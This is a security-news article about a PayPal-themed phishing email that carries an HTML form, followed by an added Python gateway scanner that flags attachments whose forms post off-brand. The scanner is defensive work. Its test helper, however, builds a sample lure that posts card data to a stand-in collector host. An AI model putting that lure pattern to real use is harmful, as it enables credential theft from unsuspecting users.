“PayPal email address change” phishing scheme doing rounds

PayPal users are targeted again as emails supposedly sent by the online payment company urge them to fill out a form with their personal and financial information in order to prevent the suspension of their accounts.

With “You have changed your PayPal email address” in the subject line, the sender attempts to convince the recipients that someone has accessed their account and changed the email address associated with it. To “keep the original email and restore their PayPal account”, the users are required to fill out the attached Personal Profile Form – PayPal-.htm form.

In order for everything to go smoothly, the sender also “helpfully” notes that “the form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9).”

Unfortunately for those who fall for this scam, the submitted information gets sent directly to the phishers, points out Sophos.
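A mail-gateway style check for the lure described above, as an added example that is not from the original article or from Sophos: it flags HTML attachments whose form posts to a host outside the brand's own domain. The trusted-domain list, the sample message, its filename and the `collector.example` host are constructed assumptions.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("paypal.com",)  # assumption: domains the real service posts forms to

class FormScanner(HTMLParser):
    """Collect <form action> targets and note whether the page carries script."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_script = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")
        elif tag == "script":
            self.has_script = True

def is_trusted(host):
    # Exact match or true subdomain only, so "paypal.com.other.example" fails.
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

def scan_message(raw):
    """Return (filename, form host, has_script) for each off-brand form target."""
    findings = []
    for part in message_from_bytes(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # HTML sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(body)
        for action in scanner.actions:
            host = urlparse(action).hostname
            if host and not is_trusted(host):  # relative actions have no remote host
                findings.append((name, host, scanner.has_script))
    return findings

def build_sample(action="http://collector.example/save.php"):
    """Constructed message modelled on the lure; host and filename are made up."""
    msg = EmailMessage()
    msg["Subject"] = "You have changed your PayPal email address"
    msg.set_content("Fill out the attached form to restore your account.")
    html = ('<html><script>/* field checks */</script><form method="post" '
            f'action="{action}"><input name="card"></form></html>')
    msg.add_attachment(html, subtype="html", filename="profile-form.htm")
    return msg.as_bytes()
```

Calling `scan_message(build_sample())` reports the attachment, the off-brand host and the presence of script; a gateway could quarantine on any non-empty result.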

As always, users are advised to ignore emails such as these – or better yet, forward them to the company’s security team – and to check whether anything is amiss by going to PayPal’s legitimate site, typing its URL directly into their browsers.